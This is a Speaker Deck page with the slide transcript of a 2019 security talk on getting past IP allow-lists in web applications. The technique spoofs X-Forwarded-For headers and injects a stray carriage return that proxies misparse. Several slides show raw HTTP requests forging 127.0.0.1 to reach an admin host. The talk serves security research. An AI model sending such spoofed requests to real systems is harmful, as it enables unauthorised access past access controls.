Upgrade to Pro — share decks privately, control downloads, hide ads and more …

At Home Among Strangers

F26c65b4ad90e281e3d866f466783201?s=47 Bo0oM
December 06, 2019
Research
1
2.5k

At Home Among Strangers

Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.

F26c65b4ad90e281e3d866f466783201?s=128

Bo0oM

December 06, 2019
Tweet

More Decks by Bo0oM

See All by Bo0oM
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
0
27
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
0
2.1k
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
0
780
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
2
1.7k
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
0
3.6k
F26c65b4ad90e281e3d866f466783201?s=48 bo0om
0
1.5k

Other Decks in Research

See All in Research
6d667e747a4a1cda7d201c3358424257?s=48 digitalnaturegroup
0
430
0fee20d8bbb7283e1887e7075f638f59?s=48 eumesy
12
3.9k
E8dd0ab5a1ff487f6e6f93cfa0d4a348?s=48 udonda
1
440
0f2a473c07602f3dd53c5ed0de0c56b5?s=48 danielkatz
PRO
0
4.3k
290a66d9796825297c2cdb438a372f6a?s=48 hashi0203
0
150
B83842a07c4241e2aec3e2dfeedf16fe?s=48 mu_mu_mu
3
740
14da6ebc2e909305afdb348e7970de81?s=48 wingnus
1
1.7k
290a66d9796825297c2cdb438a372f6a?s=48 hashi0203
0
160
27e6303669f854882d672f3cd3fcb796?s=48 dasayan05
0
450
D8b77b4b3b0373eaee6c6077c4d7330a?s=48 karakurist
23
2.8k
B91bb8ea34ba992953bfcdf5a51ea457?s=48 mns54
3
520
Da66788b8c49f71f91a69b8a8def10ad?s=48 anugrahsr
2
3.7k

Featured

See All Featured
8ec1383b240b5ba15ffb9743fceb3c0e?s=48 philnash
21
1k
5f2da528927a2ec9ba4fec2069cbc958?s=48 kneath
297
39k
D09fad3e36ae6841f54820be0e907f7a?s=48 rocio
156
12k
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
11
1.1k
282d599b414022eba5096510f675b6e2?s=48 chrislema
231
16k
44b54d2ffcb7857004071cc6795dde11?s=48 cassininazir
350
20k
C44e1f7e22c3f23cff7bc130871047ef?s=48 eileencodes
118
26k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
372
43k
88bc30284c6a424b63a92aad27d0ba36?s=48 jnunemaker
PRO
43
4.9k
7559f6cff1f5efc2d210965febd4d71c?s=48 bermonpainter
348
27k
91cefdf141106fa10674aae74ce05890?s=48 yeseniaperezcruz
307
32k
E6c6e133e74c3b83f04d2861deaa1c20?s=48 searls
207
38k

Transcript

  1. At Home Among Strangers Bypassing IP white sheets of some

    web applications due to incorrect parsing of HTTP request headers.

  2. Reverse Proxy

  3. None

  4. X-Forwarded-For: <client>, <proxy> X-Forwarded-For: <fake>, <client>, <proxy>

  5. HTTP-request GET / HTTP/1.1
 Host: admin.my.site
 Connection: close GET /

    HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <client>, <proxy>

  6. XFF/XRI Spoofing GET / HTTP/1.1
 Host: admin.my.site X-Forwarded-For: 127.0.0.1
 Connection:

    close GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake>, <client>, <proxy>

  7. HTTP-request GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\n
 Connection: close\r\n

    \r\n X-Forwarded-For: <fake>, <client>, <proxy>

  8. HTTP-request with 0d GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n


    Connection: close\r\n \r\n X-Forwarded-For: <fake>\r, <client>, <proxy>

  9. XFF/XRI Spoofing+ GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n
 Connection:

    close\r\n \r\n GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake> , <client>, <proxy> Tomcat? WebSphere?

  10. Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn